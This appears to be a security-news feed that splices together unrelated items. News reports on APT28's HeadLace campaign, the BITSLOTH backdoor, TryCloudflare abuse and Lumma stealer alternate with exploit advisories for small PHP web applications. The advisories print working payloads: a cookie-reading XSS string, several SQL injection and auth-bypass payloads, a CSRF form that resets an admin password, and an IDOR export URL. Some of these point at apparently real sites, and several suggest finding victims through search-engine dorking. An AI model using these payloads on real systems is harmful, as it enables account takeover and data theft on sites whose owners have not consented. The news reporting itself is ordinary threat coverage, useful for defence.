A Russia-linked threat actor has been linked to a new campaign that employed a car for sale as a phishing lure to deliver a modular Windows backdoor called HeadLace.

"The campaign likely targeted diplomats and began as early as March 2024," Palo Alto Networks Unit 42 said in a report published today, attributing it with medium to high level of confidence to APT28, which is also referred to as

Cyber Espionage / Malware

A Russia-linked threat actor has been linked to a new campaign that employed a car for sale as a phishing lure to deliver a modular Windows backdoor called HeadLace.

"The campaign likely targeted diplomats and began as early as March 2024," Palo Alto Networks Unit 42 said in a report published today, attributing it with medium to high level of confidence to APT28, which is also referred to as BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422.

It's worth noting that car-for-sale phishing lure themes have been previously put to use by a different Russian nation-state group called APT29 since July 2023, indicating that APT28 is repurposing successful tactics for its own campaigns.

Earlier this May, the threat actor was implicated in a series of campaigns targeting networks across Europe with the HeadLace malware and credential-harvesting web pages.

The attacks are characterized by the use of a legitimate service known as webhook\[.\]site – a hallmark of APT28's cyber operations along with Mocky – to host a malicious HTML page, which first checks whether the target machine is running on Windows and if so, offers a ZIP archive for download ("IMG-387470302099.zip").

If the system is not Windows-based, it redirects to a decoy image hosted on ImgBB, specifically an Audi Q7 Quattro SUV.

Present within the archive are three files: The legitimate Windows calculator executable that masquerades as an image file ("IMG-387470302099.jpg.exe"), a DLL ("WindowsCodecs.dll"), and a batch script ("zqtxmo.bat").

The calculator binary is used to sideload the malicious DLL, a component of the HeadLace backdoor that's designed to run the batch script, which, in turn, executes a Base64-encoded command to retrieve a file from another webhook\[.\]site URL.

This file is then saved as "IMG387470302099.jpg" in the users' downloads folder and renamed to "IMG387470302099.cmd" prior to execution, after which it's deleted to erase traces of any malicious activity.

"While the infrastructure used by Fighting Ursa varies for different attack campaigns, the group frequently relies on these freely available services," Unit 42 said. "Furthermore, the tactics from this campaign fit with previously documented Fighting Ursa campaigns, and the HeadLace backdoor is exclusive to this threat actor."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

APT28 Targets Diplomats with HeadLace Malware via Car Sale Phishing Lure

Tourism Management System version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Tourism Management System v2.0 - Cross Site Scripting (XSS)# Date: 13 July 2024# Exploit Author: Sampath kumar kadajari# Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7204 # Version: v2.0# CVE: CVE-2024-41333# Tested on: Windows, XAMPP, Apache, MySQL-------------------------------------------------------------------------------------------------------------------------------------------A reflected cross-site scripting (XSS) vulnerability in Phpgurukul Tourism Management System v2.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the uname parameter."Vulnerable Code" – (/admin/user-bookings.php)<h2>Manage <?php echo $_GET['uname'];?>'s Bookings</h2>---> Affected Component: http://localhost/tms/admin/user-bookings.php?uid=manju@gmail.com&&uname=%22%3E%3Cimg%20src/onerror=prompt(document.cookie)%3E "Fix for Vulnerable Code" <h2>Manage <?php echo htmlspecialchars($_GET['uname'], ENT_QUOTES, 'UTF-8'); ?>'s Bookings</h2>

Tourism Management System 2.0 Cross Site Scripting

Computer Laboratory Management System version 1.0 suffers from an incorrect access control that allows for privilege escalation.

    # Exploit Title: Computer Laboratory Management System v1.0 - Incorrect access control# Date: 08 July 2024# Exploit Author: Sampath kumar kadajari# Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html# Software Link: https://www.sourcecodester.com/download-code?nid=17268&title=Computer+Laboratory+Management+System+using+PHP+and+MySQL# Version: v1.0# CVE: CVE-2024-41332# Tested on: Windows, XAMPP, Apache, MySQL-------------------------------------------------------------------------------------------------------------------------------------------Incorrect access control in the delete_category function of Sourcecodester Computer Laboratory Management System v1.0 allows authenticated attackers with low-level privileges to perform arbitrarily delete actions. "Vulnerable Code" – ( classes/master.php)function delete_category(){        extract($_POST);        $del = $this->conn->query("UPDATE `category_list` set `delete_flag` = 1 where id = '{$id}'");        if($del){            $resp['status'] = 'success';            $this->settings->set_flashdata('success'," Category successfully deleted.");        }else{            $resp['status'] = 'failed';            $resp['error'] = $this->conn->error;        }        return json_encode($resp);}---> Affected Component:  http://localhost/php-lms/classes/Master.php?f=delete_category"Fix for Vulnerable Code":function delete_category(){    // Check if the user is logged in and has an admin role    if (!isset($_SESSION['userdata']['role']) || $_SESSION['userdata']['role'] != 'admin') {        $resp['status'] = 'failed';        $resp['error'] = 'Unauthorized access.';        return json_encode($resp);    }    // Proceed with the delete action if authorized    extract($_POST);    $del = $this->conn->query("UPDATE `category_list` set `delete_flag` = 1 where id = '{$id}'");    if($del){        $resp['status'] = 'success';        $this->settings->set_flashdata('success',"Category successfully deleted.");    }else{        $resp['status'] = 'failed';        $resp['error'] = $this->conn->error;    }    return json_encode($resp);}

Computer Laboratory Management System 1.0 Privilege Escalation

Leads Manager Tool suffers from remote SQL injection and cross site scripting vulnerabilities.

    [x]========================================================================================================================================[x] | Title        : Leads Manager Tool SQL & XSS[stored)] Vulnerabilities | Software     : Leads Manager Tool Using PHP and MySQL with Source Code | Create By  : https://www.sourcecodester.com/users/remyandrade | First Release: 25/01/22 | Download     : https://www.sourcecodester.com/php/17510/leads-manager-tool-using-php-and-mysql-source-code.html | Date         : 30 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology       : PHP | Database         : MySQL | Price            : FREE | Description      : Leads Manager Tool, a comprehensive web application designed to streamline the process of managing business leads. Built with the power of PHP and MySQL, this tool offers a seamless and user-friendly experience for storing, updating, and organizing lead information[x]========================================================================================================================================[x][O] Exploit    http://localhost/leads-manager-tool/endpoint/delete-leads.php?leads=[SQL]  http://localhost/leads-manager-tool/endpoint/add-leads.php    [O] Proof of concept  [SQL]  Parameter: leads (GET)    Type: boolean-based blind  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  Payload: leads= --emurate' RLIKE (SELECT (CASE WHEN (8305=8305) THEN 0x202d2d656d7572617465 ELSE 0x28 END))-- rUwl  Type: error-based  Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  Payload: leads= --emurate' OR (SELECT 1382 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(1382=1382,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vKls  Type: stacked queries  Title: MySQL >= 5.0.12 stacked queries (comment)  Payload: leads= --emurate';SELECT SLEEP(5)#  Type: time-based blind  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  Payload: leads= --emurate' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))fAev)-- ZNBt    [XSS]    POST /leads-manager-tool/endpoint/add-leads.php HTTP/1.1  Host: 127.0.0.1  Accept-Encoding: gzip, deflate, br  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  Accept-Language: en-US;q=0.9,en;q=0.8  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36  Connection: close  Cache-Control: max-age=0  Origin: http://127.0.0.1  Upgrade-Insecure-Requests: 1  Referer: http://127.0.0.1/leads-manager-tool/  Content-Type: application/x-www-form-urlencoded  Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="126", "Chromium";v="126"  Sec-CH-UA-Platform: Windows  Sec-CH-UA-Mobile: ?0  Content-Length: 85  leads_name=Vrs<script>alert(1)</script>Hck&email_add=vrs-hck@maho.id&phone_number=911-911-9111    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

Leads Manager Tool SQL Injection / Cross Site Scripting

Appointment Scheduler version 3.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Appointment Scheduler v3.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport[+] http://127.0.0.1/www/ wongkit.com.hk/appointment/index.php?controller=pjAdminBookings&action=pjActionExportGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Appointment Scheduler 3.0 Insecure Direct Object Reference

AccPack Cop version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : AccPack Cop v1.0 CSRF Vulnerability                                                                                         |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : http://webpay.com.np/#Product                                                                                               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 5. Set the target site link Save changes and apply . 

[+] infected file : cms/user/modify.php.

[+] http://127.0.0.1/q7.3/cms/user/modify.php.

[+] save code as poc.html 

[+] payload : 

</head>  
<body>  
  <div class="container">  
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>  
    <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST"  enctype="multipart/form-data">  
      <div hidden="true">  
        <input type="text" name="id" id="id" value="1">  
      </div>  
       <div>  
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">  
       </div>  
       <div>  
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">  
       </div>  
       <tr>  
       <div>  
        <label for='status'>Status</label>  
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>  
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>

               </div>     
       <div style='height:80'>  
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>  
       </div>  
    </form>  
  </div>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

AccPack Cop 1.0 Cross Site Request Forgery

AccPack Buzz version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AccPack Buzz v1.0 Auth By Pass Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Buzz 1.0 SQL Injection

Cybersecurity researchers have discovered a previously undocumented Windows backdoor that leverages a built-in feature called Background Intelligent Transfer Service (BITS) as a command-and-control (C2) mechanism.
The newly identified malware strain has been codenamed BITSLOTH by Elastic Security Labs, which made the discovery on June 25, 2024, in connection with a cyber attack targeting an

Cyber Attack / Windows Security

Cybersecurity researchers have discovered a previously undocumented Windows backdoor that leverages a built-in feature called Background Intelligent Transfer Service (BITS) as a command-and-control (C2) mechanism.

The newly identified malware strain has been codenamed **BITSLOTH** by Elastic Security Labs, which made the discovery on June 25, 2024, in connection with a cyber attack targeting an unspecified Foreign Ministry of a South American government. The activity cluster is being tracked under the moniker REF8747.

"The most current iteration of the backdoor at the time of this publication has 35 handler functions including keylogging and screen capture capabilities," security researchers Seth Goodwin and Daniel Stepanic said. "In addition, BITSLOTH contains many different features for discovery, enumeration, and command-line execution."

It's assessed that the tool – in development since December 2021 – is being used by the threat actors for data gathering purposes. It's currently not clear who is behind it, although a source code analysis has uncovered logging functions and strings that suggest the authors could be Chinese speakers.

Another potential link to China comes from the use of an open-source tool called RingQ. RingQ is used to encrypt the malware and prevent detection by security software, which is then decrypted and executed directly in memory.

In June 2024, the AhnLab Security Intelligence Center's (ASEC) revealed that vulnerable web servers are being exploited to drop web shells, which are then leveraged to deliver additional payloads, including a cryptocurrency miner via RingQ. The attacks were attributed to a Chinese-speaking threat actor.

The attack is also notable for the use of STOWAWAY to proxy encrypted C2 traffic over HTTP and a port forwarding utility called iox, the latter of which has been previously leveraged by a Chinese cyber espionage group dubbed Bronze Starlight (aka Emperor Dragonfly) in Cheerscrypt ransomware attacks.

BITSLOTH, which takes the form of a DLL file ("flengine.dll"), is loaded by means of DLL side-loading techniques by using a legitimate executable associated with Image-Line known as FL Studio ("fl.exe").

"In the latest version, a new scheduling component was added by the developer to control specific times when BITSLOTH should operate in a victim environment," the researchers said. "This is a feature we have observed in other modern malware families such as EAGERBEE."

A fully-featured backdoor, BITSLOTH is capable of running and executing commands, uploading and downloading files, performing enumeration and discovery, and harvesting sensitive data through keylogging and screen capturing.

It can also set the communication mode to either HTTP or HTTPS, remove or reconfigure persistence, terminate arbitrary processes, log users off from the machine, restart or shutdown the system, and even update or delete itself from the host. A defining aspect of the malware is its use of BITS for C2.

"This medium is appealing to adversaries because many organizations still struggle to monitor BITS network traffic and detect unusual BITS jobs," the researchers added.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Windows Backdoor BITSLOTH Exploits BITS for Stealthy Communication

Cybersecurity companies are warning about an uptick in the abuse of Clouflare's TryCloudflare free service for malware delivery.
The activity, documented by both eSentire and Proofpoint, entails the use of TryCloudflare to create a one-time tunnel that acts as a conduit to relay traffic from an attacker-controlled server to a local machine through Cloudflare's infrastructure.
Attack chains

Malware / Network Security

Cybersecurity companies are warning about an uptick in the abuse of Clouflare's TryCloudflare free service for malware delivery.

The activity, documented by both eSentire and Proofpoint, entails the use of TryCloudflare to create a one-time tunnel that acts as a conduit to relay traffic from an attacker-controlled server to a local machine through Cloudflare's infrastructure.

Attack chains taking advantage of this technique have been observed delivering a cocktail of malware families such as AsyncRAT, GuLoader, PureLogs Stealer, Remcos RAT, Venom RAT, and XWorm.

The initial access vector is a phishing email containing a ZIP archive, which includes a URL shortcut file that leads the message recipient to a Windows shortcut file hosted on a TryCloudflare-proxied WebDAV server.

The shortcut file, in turn, executes next-stage batch scripts responsible for retrieving and executing additional Python payloads, while simultaneously displaying a decoy PDF document hosted on the same WebDAV server to keep up the ruse.

"These scripts executed actions such as launching decoy PDFs, downloading additional malicious payloads, and changing file attributes to avoid detection," eSentire noted.

"A key element of their strategy was using direct syscalls to bypass security monitoring tools, decrypting layers of shellcode, and deploying the Early Bird APC queue injection to stealthily execute code and evade detection effectively."

According to Proofpoint, the phishing lures are written in English, French, Spanish, and German, with the email volumes ranging from hundreds to tens of thousands of messages that target organizations from across the world. The themes cover a broad range of topics such as invoices, document requests, package deliveries, and taxes.

The campaign, while attributed to one cluster of related activity, has not been linked to a specific threat actor or group, but the email security vendor assessed it to be financially motivated.

The exploitation of TryCloudflare for malicious ends was first recorded last year, when Sysdig uncovered a cryptojacking and proxyjacking campaign dubbed LABRAT that weaponized a now-patched critical flaw in GitLab to infiltrate targets and obscure their command-and-control (C2) servers using Cloudflare tunnels.

Furthermore, the use of WebDAV and Server Message Block (SMB) for payload staging and delivery necessitates that enterprises restrict access to external file-sharing services to only known, allow-listed servers.

"The use of Cloudflare tunnels provide the threat actors a way to use temporary infrastructure to scale their operations providing flexibility to build and take down instances in a timely manner," Proofpoint researchers Joe Wise and Selena Larson said.

"This makes it harder for defenders and traditional security measures such as relying on static blocklists. Temporary Cloudflare instances allow attackers a low-cost method to stage attacks with helper scripts, with limited exposure for detection and takedown efforts."

The findings come as the Spamhaus Project called on Cloudflare to review its anti-abuse policies following cybercriminals' exploitation of its services to mask malicious actions and enhance their operational security by means of what's called "living-off-trusted-services" (LoTS).

It said it "observes miscreants moving their domains, which are already listed in the DBL, to Cloudflare to disguise the backend of their operation, be it spamvertized domains, phishing, or worse."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Abusing Cloudflare Tunnels to Evade Detection and Spread Malware

A malvertising campaign uses phishing to steal legitimate account pages, with the endgame of delivering the Lumma stealer.

Source: Hocus Focus Studio via iStock

Attackers are hijacking pages on Facebook to lure victims into downloading a legitimate artificial intelligence (AI) photo editor, but then serving up a widely distributed infostealer to rob users of their credentials instead.

The malvertising campaign, discovered by researchers at Trend Micro, exploits the popularity of AI and combines a variety of popular threat tactics, including phishing, social engineering, and the use a legitimate utility in a malicious way. The ultimate payload is the Lumma stealer, which targets sensitive information, including user credentials, system details, browser data, and extensions.

The attack hinges on the abuse of paid Facebook promotions, which attackers have leveraged to lure users into engagement and ultimately deliver malware, the researchers noted in a blog post today.

“Once the attacker gains control of the page, ads are posted promoting the AI photo editor, leading victims to download an endpoint management utility disguised as the photo editor,” Trend Micro threat researcher Jaromir Horejsi wrote.

Attackers also are taking advantage of the current attention on AI technology and tools associated with it by using these tools "as lures for malicious activities, which includes phishing scams, deepfakes, and automated attacks," he wrote.

So far, the malicious package associated with the campaign has generated about 16,000 downloads on Windows and 1,200 on macOS. However, the macOS version redirects to the Apple website instead of an attacker-controlled site, suggesting that attackers are only targeting Windows users with the campaign.

**Phishing Leads to Hijacked Pages**

A typical attack in the campaign starts before a potential victim even sees an ad. Attackers begin by sending phishing messages to owners of the targeted social media page to gain control of the page for their own malicious use. The sender account typically looks like an empty profile with randomly generated user names.

The phishing links in the messages are sent either as direct links or personalized link pages, such as linkup.top, bio.link, s.id, and linkbio.co, among others. Sometimes attackers even abuse Facebook's open redirect URL for these links to appear more legitimate.

If the page operator clicks on the links, they are presented with a screen to verify their information with a "Business Support Center" for Meta developers. Clicking on that screen's "Verify Your Information Here" link leads to a fake account protection page, "which in several subsequent steps, asks users for the information necessary to log in and take over their account, such as their phone number, email address, birthday, and password," Horejsi explained.

After the target provides this info, the attacker steals the profile and begins creating and posting malicious ads for an AI photo editor with links to a fake domain that uses the name of a legitimate tool, such as Evoto.

"The fake photo editor web page looks very similar to the original one, which helps in tricking the victim into thinking that they are downloading a photo editor," Horejsi wrote.

However, what a user who takes the bait actually downloads is the freely available ITarian endpoint management software. The attacker, using a series of back-end processes controls, ultimately controls the victim's machine to download the final payload, the Lumma stealer.

**Avoiding Compromise**

There are a number of ways that people can avoid falling victim to the campaign and threats that abuse social media pages, which not only can compromise users but also lead to secondary attacks via stolen credentials that act as initial entry into enterprise infrastructure, according to Trend Micro.

Social-media users should enable multifactor authentication on all their accounts to add an extra layer of protection against unauthorized access, as well as regularly update and use strong, unique passwords across all accounts.

Organizations also should regularly practice education and awareness to let their employees know of the dangers lurking on social media while accessing corporate networks, as well as how to identify suspicious messages and links associated with phishing attacks.

Finally, both organizations and individual users should monitor their accounts for any unusual behavior, such as unexpected login attempts or changes to account information. Organizations should employ some kind of detection and response mechanisms.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Tag

#windows